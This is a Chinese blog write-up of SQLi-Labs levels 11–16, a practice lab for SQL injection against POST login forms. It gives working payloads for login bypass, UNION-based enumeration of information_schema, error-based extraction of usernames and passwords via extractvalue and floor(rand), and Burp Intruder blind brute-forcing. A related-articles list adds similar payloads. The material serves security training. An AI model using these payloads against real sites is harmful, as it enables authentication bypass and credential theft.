SQLi-Labs Less11-Less16

最新推荐文章于 2024-03-03 12:54:23 发布
最新推荐文章于 2024-03-03 12:54:23 发布
阅读量324 收藏
点赞数
分类专栏: SQL注入 文章标签: SQL注入 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KRDecad3/article/details/84801359
版权

Less-11-POST-Error Based-Single quotes-String

username栏输入一个单引号报错:
在这里插入图片描述

说明查询语句有username='$_POST[username]' and password='$_POST[password]',查询有两个字段
username栏输入
' or 1=1#
提交,绕过登陆验证,并且知道两处可以回显。
在这里插入图片描述
构造查询数据库名:
' union select database(),@@version#
在这里插入图片描述

查数据表,username栏输入:
' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述

查users表的列名,输入:
' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#
在这里插入图片描述

Less-12-POST-Error Based-Double quotes-String-with twist

username栏输入双引号报错:
在这里插入图片描述

查询语句里是用括号和双引号包裹$_POST参数的。
输入:") or 1=1#绕过
查数据库名:") union select database(),@@version#
查数据表名:
") union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
方法同Less-11类似,只是将单引号换成双引号外加括号。
省略下面的步骤……

Less-13-POST-Double Injection-Single quotes-String-with twist

输入单引号报错,从报错里看到参数是用单引号和括号包裹的。
输入:') or 1=1#万能密码绕过。
输入') union select database(),2#能绕过,但不回显。
尝试报错注入语句,输入:
') union select count(*),concat('~',(select database()),'~',floor(rand(0)*2)) a from information_schema.tables group by a#
在这里插入图片描述

得到数据库名。
查数据表数量,这里用extractvalue函数报错:
') and extractvalue(1,concat(0x5c,(select count(table_name) from information_schema.tables where table_schema='security'),0x5c))#
在这里插入图片描述

查数据表名:
') and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x5c))#
更改limit子句查出所有表名。
在这里插入图片描述

查users表的列数量:
') and extractvalue(1,concat(0x5c,(select count(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x5c))#
在这里插入图片描述

查users表的列名:
') and extractvalue(1,concat(0x5c,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x5c))#
在这里插入图片描述

查数据:
') and extractvalue(1,concat(0x5c,(select concat(username,'~',password) from security.users limit 1,1),0x5c))#

具体方法可参考Less-5和Less-6

Less-14-POST-Double Injection-Double quotes-String-with twist

Less-14同Less-13只有双引号的差别。

Less-15-POST-Blind-Boolean/time Based-Single qoutes

POST的基于布尔/时间盲注,这里可以使用burp的intruder模块进行盲注。
在页面上测试输入:' or 1=1#可以绕过,
用burp抓包,右键send to intruder。
查数据库名:
positions栏里的Attack type设置为Cluster bomb,
uname参数输入:' or ascii(substr(database(),1,1))=97#
设置payload位置:
在这里插入图片描述

payloads栏里payloads set1和2的payload type都设置为Numbers,
payload Options设置payload1 from 1 to 10 step 1
payload2 from 97 to 130 step 1
点击start attack,最后在结果里查找length不同的即为正确的payload
在这里插入图片描述

暴数据表:
在这里插入图片描述
在这里插入图片描述

同理可以暴破字段名,数据等。
具体盲注技巧可以参考Less7-10

Less-16-POST-Blind-Boolean/Time Based-Double quotes

Less-16方法同Less-15类似,采用布尔盲注或时间盲注,并换成双引号。

KRDecad3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs:Less-11-Less-20
打代码的小女孩
12-23 636
Less-11~Less-20是post型注入,一般都是登陆绕过,当然也是可以获取数据库的信息。
sqli-labs Less-16
qq_42630215的博客
04-01 227
Less-16 POST -Blind -Boolian/Time Based -Double quotes Less-16和Less-15关都是盲注,在构造payload的时候只需要把’替换为")就可以了。 0x01. 询语句: uname=1&passwd=1 or 1=1# uname=1&passwd=1’ or 1=1# uname=1&passwd=1” or...
sqli-labs (less-16)
kukudeshuo的博客
03-11 622
sqli-labs (less-16) 进入16关,输入用户名和密码,可以看到没有数据回显 输入 uname=admin'&passwd=admin&submit=Submit #没有错误回显 uname=admin"&passwd=admin&submit=Submit #没有错误回显 没有错误回显,我们只能一个一个去猜闭合方式,利用时间盲注去判断注入点 uname=admin' and sleep(5)#&passwd=admin&submit=Su
sqli-labs/Less-16
m0_71299382的博客
11-18 265
sqli-labs第十六关
sqli-labs ————less -16
Fly_鹏程万里
05-11 512
Less-16源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs less-15 & less-16
water0diamond的博客
03-17 624
POST-Blind-Boolian/time Based-Single quotes (基于bool/时间的单引号POST型盲注) Less-15 POST-Blind-Boolian/Time Based-Double quotes (基于bool/时间的双引号POST型盲注) Less-16 我们可以看到随便输入用户名和密码不会有任何返回 试过很多发现,无论是随便乱输密...
sqli-labs less-11 & less-12
water0diamond的博客
03-17 918
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1401
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema询-version()二、数据用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1828
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema询-version()二、数据用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
03-03 707
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
SQLi LABS Less 16 布尔盲注
热门推荐
wangyuxiang946的博客
08-14 1万+
SQLi 第十六关,SQLi-LABS Less-16SQLi-LABS Less 16SQLiLABS Less16SQLi Less 16
sqli-labs ————less -11(POST注入)
Fly_鹏程万里
05-11 3601
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
Sqli-labs之Less-15和Less-16
→_→
04-08 2254
Less-15 基于布尔型/时间延迟单引号POST型盲注 测试: ?id=1uname=1&passwd=1uname=1&passwd=1 ?id=1'...
sqli-labs less11-16
sopora的博客
10-09 256
LESS 11 基于字符串的注入(POST) 在username栏输入单引号’测试,结果: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and passwo...
Sqli-Labs Less1-16关详细讲解
大大大蜜蜂的博客
10-21 3903
information_schema数据库介绍: information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是关于数据数据,如数据库名或表名,列的数据类型,或访问权限等。information_schema是信息数据库,其中保存着关于mysql服务器所维护的所有其他数据库的信息。 下列为information_schema数据库中schemata表、tables表、columns表的介绍。 schemata表:提供了当前mysql实例中所有数据库的信息。 sche
sqli-labs-Less-16 布尔盲注
yzcn
11-13 173
Less-16 布尔盲注 利用burp suite进行抓包 利用hackba插件中的post data进行注入 方法一:布尔盲注 判断注入点: uname=") or 1=1 # &passwd=&submit=Submit 显示登录成功,说明闭合方式为(“”),存在注入漏洞 猜解当前数据库名: 猜解数据库名长度: uname=") or length(database())>5# &passwd=&submit=Submit 第一个字母:uname=") or
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值